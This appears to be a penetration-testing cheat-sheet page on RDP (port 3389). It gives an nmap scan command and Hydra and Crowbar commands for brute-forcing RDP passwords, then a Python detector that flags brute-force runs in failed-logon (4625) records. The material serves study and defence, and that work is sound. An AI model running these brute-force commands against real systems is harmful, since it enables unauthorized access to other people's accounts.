3389 - RDP

Theory

The Remote Desktop Protocol (RDP) is the protocol commonly used to connect remotely to Windows operating systems. If it is enabled on the remote host, users can connect to the graphical user interface of the Windows host. The RDP server listens on port 3389.


Practical

Nmap Scan

nmap -sV -sC -O -T5 -p 3389 <IP>

Brute Force

Hydra

hydra -L <user list> -P <password list> rdp://<IP>

hydra -l "Administrator" -P ~/Desktop/users.txt rdp://<IP>

Crowbar

# Install Crowbar
sudo apt install crowbar

# Brute force
crowbar -b rdp -s 172.16.0.104/32 -u admin -C /root/pass.txt
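
Detection

What the brute-force runs above look like from the defender's side, as an added example that is not part of the original page: a sliding-window detector over failed-logon records (Windows Security event 4625). The simplified record format, the sample data, the function names and the threshold/window values are assumptions made for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (not real log data): logon events reduced to
# "timestamp,event_id,logon_type,source_ip,target_user".
SAMPLE_EVENTS = """\
2024-05-01T10:00:00,4625,3,203.0.113.7,Administrator
2024-05-01T10:00:02,4625,3,203.0.113.7,Administrator
2024-05-01T10:00:04,4625,3,203.0.113.7,Administrator
2024-05-01T10:00:06,4625,3,203.0.113.7,Administrator
2024-05-01T10:00:08,4625,3,203.0.113.7,Administrator
2024-05-01T10:05:00,4625,10,198.51.100.9,admin
2024-05-01T10:05:05,4625,10,198.51.100.9,backup
2024-05-01T10:05:10,4625,10,198.51.100.9,svc_sql
2024-05-01T10:05:15,4625,10,198.51.100.9,guest
2024-05-01T10:05:20,4625,10,198.51.100.9,jsmith
2024-05-01T09:00:00,4625,10,192.0.2.15,alice
2024-05-01T09:00:30,4624,10,192.0.2.15,alice
2024-05-01T10:00:03,4625,2,192.0.2.20,bob
"""

# Event 4625 = failed logon. Logon type 10 = RemoteInteractive (RDP);
# type 3 = Network, which is how failed RDP logons appear when NLA is enabled.
RDP_LOGON_TYPES = {"3", "10"}

def parse(text):
    """Yield (timestamp, source_ip, user) for failed RDP-related logons only."""
    for line in text.strip().splitlines():
        ts, event_id, logon_type, ip, user = line.split(",")
        if event_id == "4625" and logon_type in RDP_LOGON_TYPES:
            yield datetime.fromisoformat(ts), ip, user

def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failures inside any sliding window."""
    recent = defaultdict(deque)   # ip -> failures still inside the window
    alerts = {}                   # ip -> {"peak": int, "users": set}
    for ts, ip, user in sorted(parse(text)):
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:      # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            hit = alerts.setdefault(ip, {"peak": 0, "users": set()})
            hit["peak"] = max(hit["peak"], len(q))
            hit["users"].update(u for _, u in q)
    return {ip: {"peak": h["peak"], "users": sorted(h["users"])} for ip, h in alerts.items()}

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_EVENTS))
```

A single entry in "users" matches one account tried against many passwords (the hydra -l form above); several entries match a user list (the -L form).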

